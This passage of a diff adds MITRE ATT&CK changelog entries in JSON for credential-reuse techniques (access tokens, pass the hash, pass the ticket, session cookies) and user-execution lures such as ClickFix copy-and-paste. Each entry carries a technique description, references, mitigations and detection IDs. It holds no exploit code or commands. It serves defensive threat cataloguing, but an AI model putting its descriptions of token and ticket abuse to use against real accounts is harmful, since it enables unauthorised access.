+                            "M1027: Password Policies",
+                            "M1036: Account Use Policies",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0338: Behavioral Detection Strategy for Use Alternate Authentication Material (T1550)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 17:37:22.261000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Application Access Token",
+                    "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim\u2019s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured \u2013 for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.  For example, in AWS environments, an adversary who compromises a user\u2019s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1550/001",
+                            "external_id": "T1550.001"
+                        },
+                        {
+                            "source_name": "Crowdstrike AWS User Federation Persistence",
+                            "description": " Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.",
+                            "url": "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/"
+                        },
+                        {
+                            "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019",
+                            "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.",
+                            "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/"
+                        },
+                        {
+                            "source_name": "AWS Temporary Security Credentials",
+                            "description": "AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.",
+                            "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html"
+                        },
+                        {
+                            "source_name": "Microsoft Identity Platform Access 2019",
+                            "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens"
+                        },
+                        {
+                            "source_name": "Google Cloud Service Account Credentials",
+                            "description": "Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.",
+                            "url": "https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials"
+                        },
+                        {
+                            "source_name": "okta",
+                            "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.",
+                            "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen"
+                        },
+                        {
+                            "source_name": "Rhino Security Labs Enumerating AWS Roles",
+                            "description": "Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through \u2018AssumeRole\u2019. Retrieved April 1, 2022.",
+                            "url": "https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration"
+                        },
+                        {
+                            "source_name": "Staaldraad Phishing with OAuth 2017",
+                            "description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.",
+                            "url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Blake Strom, Microsoft Threat Intelligence",
+                        "Dylan Silva, AWS Security",
+                        "Ian Davila, Tidal Cyber",
+                        "Jack Burns, HubSpot",
+                        "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
+                        "Mark Wee",
+                        "Pawel Partyka, Microsoft Threat Intelligence",
+                        "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)",
+                        "Shailesh Tiwary (Indian Army)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "IaaS",
+                        "Identity Provider",
+                        "Office Suite",
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 22:48:23.373000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1021: Restrict Web-Based Content",
+                            "M1036: Account Use Policies",
+                            "M1041: Encrypt Sensitive Information",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0185: Behavioral Detection Strategy for Use Alternate Authentication Material: Application Access Token (T1550.001)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 16:36:51.184000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Pass the Hash",
+                    "description": "Adversaries may \u201cpass the hash\u201d using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1550/002",
+                            "external_id": "T1550.002"
+                        },
+                        {
+                            "source_name": "Stealthbits Overpass-the-Hash",
+                            "description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.",
+                            "url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Blake Strom, Microsoft 365 Defender",
+                        "Travis Smith, Tripwire"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 22:48:07.235000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1051: Update Software",
+                            "M1052: User Account Control"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0409: Detection Strategy for T1550.002 - Pass the Hash (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 17:03:43.072000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Pass the Ticket",
+                    "description": "Adversaries may \u201cpass the ticket\u201d using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1550/003",
+                            "external_id": "T1550.003"
+                        },
+                        {
+                            "source_name": "Campbell 2014",
+                            "description": "Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved November 17, 2024.",
+                            "url": "https://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf"
+                        },
+                        {
+                            "source_name": "GentilKiwi Pass the Ticket",
+                            "description": "Deply, B. (2014, January 13). Pass the ticket. Retrieved September 12, 2024.",
+                            "url": "https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos"
+                        },
+                        {
+                            "source_name": "ADSecurity AD Kerberos Attacks",
+                            "description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.",
+                            "url": "https://adsecurity.org/?p=556"
+                        },
+                        {
+                            "source_name": "Stealthbits Overpass-the-Hash",
+                            "description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.",
+                            "url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ryan Becwar",
+                        "Vincent Le Toux"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2026-04-15 22:47:57.805000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1015: Active Directory Configuration",
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0352: Detection Strategy for T1550.003 - Pass the Ticket (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-30 17:48:49.395000+00:00",
+                    "modified": "2026-05-12 15:12:00.714000+00:00",
+                    "name": "Web Session Cookie",
+                    "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1550/004",
+                            "external_id": "T1550.004"
+                        },
+                        {
+                            "source_name": "Unit 42 Mac Crypto Cookies January 2019",
+                            "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/"
+                        },
+                        {
+                            "source_name": "Pass The Cookie",
+                            "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.",
+                            "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jack Burns, HubSpot",
+                        "Johann Rehberger"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Office Suite",
+                        "SaaS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.714000+00:00\", \"old_value\": \"2026-04-15 22:48:02.590000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0074: Detect Use of Stolen Web Session Cookies Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e261a979-f354-41a8-963e-6cadac27c4bf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-18 12:57:50.188000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Malicious Copy and Paste",
+                    "description": "An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). One such strategy is \"ClickFix,\" in which adversaries present users with seemingly helpful solutions\u2014such as prompts to fix errors or complete CAPTCHAs\u2014that instead instruct the user to copy and paste malicious code.\n\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\n\nAdversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the \"ClickFix\" strategy.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\n\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1204/004",
+                            "external_id": "T1204.004"
+                        },
+                        {
+                            "source_name": "AhnLab Malicioys Copy Paste 2024",
+                            "description": "AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.",
+                            "url": "https://asec.ahnlab.com/en/73952/"
+                        },
+                        {
+                            "source_name": "AhnLab LummaC2 2025",
+                            "description": "AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.",
+                            "url": "https://asec.ahnlab.com/en/85699/"
+                        },
+                        {
+                            "source_name": "Reliaquest CAPTCHA 2024",
+                            "description": "Alex Capraro. (2024, December 17). Using CAPTCHA for Compromise: Hackers Flip the Script. Retrieved March 18, 2025.",
+                            "url": "https://www.reliaquest.com/blog/using-captcha-for-compromise/"
+                        },
+                        {
+                            "source_name": "Sekoia ClickFake 2025",
+                            "description": "Amaury G., Coline Chavane, Felix Aim\u00e9 and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.",
+                            "url": "https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/"
+                        },
+                        {
+                            "source_name": "CloudSEK Lumma Stealer 2024",
+                            "description": "CloudSEK TRIAD. (2024, September 19). Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages. Retrieved March 18, 2025.",
+                            "url": "https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages"
+                        },
+                        {
+                            "source_name": "Proofpoint ClickFix 2024",
+                            "description": "Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team. (2024, November 18). Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape. Retrieved March 18, 2025.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ale Houspanossian",
+                        "Fernando Bacchin",
+                        "Gabriel Currie",
+                        "Harikrishnan Muthu, Cyble",
+                        "Menachem Goldstein",
+                        "ReliaQuest",
+                        "SeungYoul Yoo, AhnLab"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2026-03-27 20:05:57.921000+00:00\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1031: Network Intrusion Prevention",
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0340: User Execution \u2013 Malicious Copy & Paste (browser/email \u2192 shell with obfuscated one-liner) \u2013 T1204.004"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-11 14:49:36.954000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Malicious File",
+                    "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, .reg, and .iso.(Citation: Mandiant Trojanized Windows 10)\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) \n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1204/002",
+                            "external_id": "T1204.002"
+                        },
+                        {
+                            "source_name": "Password Protected Word Docs",
+                            "description": "Lawrence Abrams. (2017, July 12). PSA: Don't Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.",
+                            "url": "https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/"
+                        },
+                        {
+                            "source_name": "Mandiant Trojanized Windows 10",
+                            "description": "Mandiant Intelligence. (2022, December 15). Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government. Retrieved September 26, 2025.",
+                            "url": "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "TruKno"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2025-10-24 17:48:31.674000+00:00\"}}}",
+                    "previous_version": "1.6",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0294: User Execution \u2013 Malicious File via download/open \u2192 spawn chain (T1204.002)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-11 14:43:31.706000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Malicious Link",
+                    "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1204/001",
+                            "external_id": "T1204.001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-10-24 17:49:35.144000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1021: Restrict Web-Based Content",
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
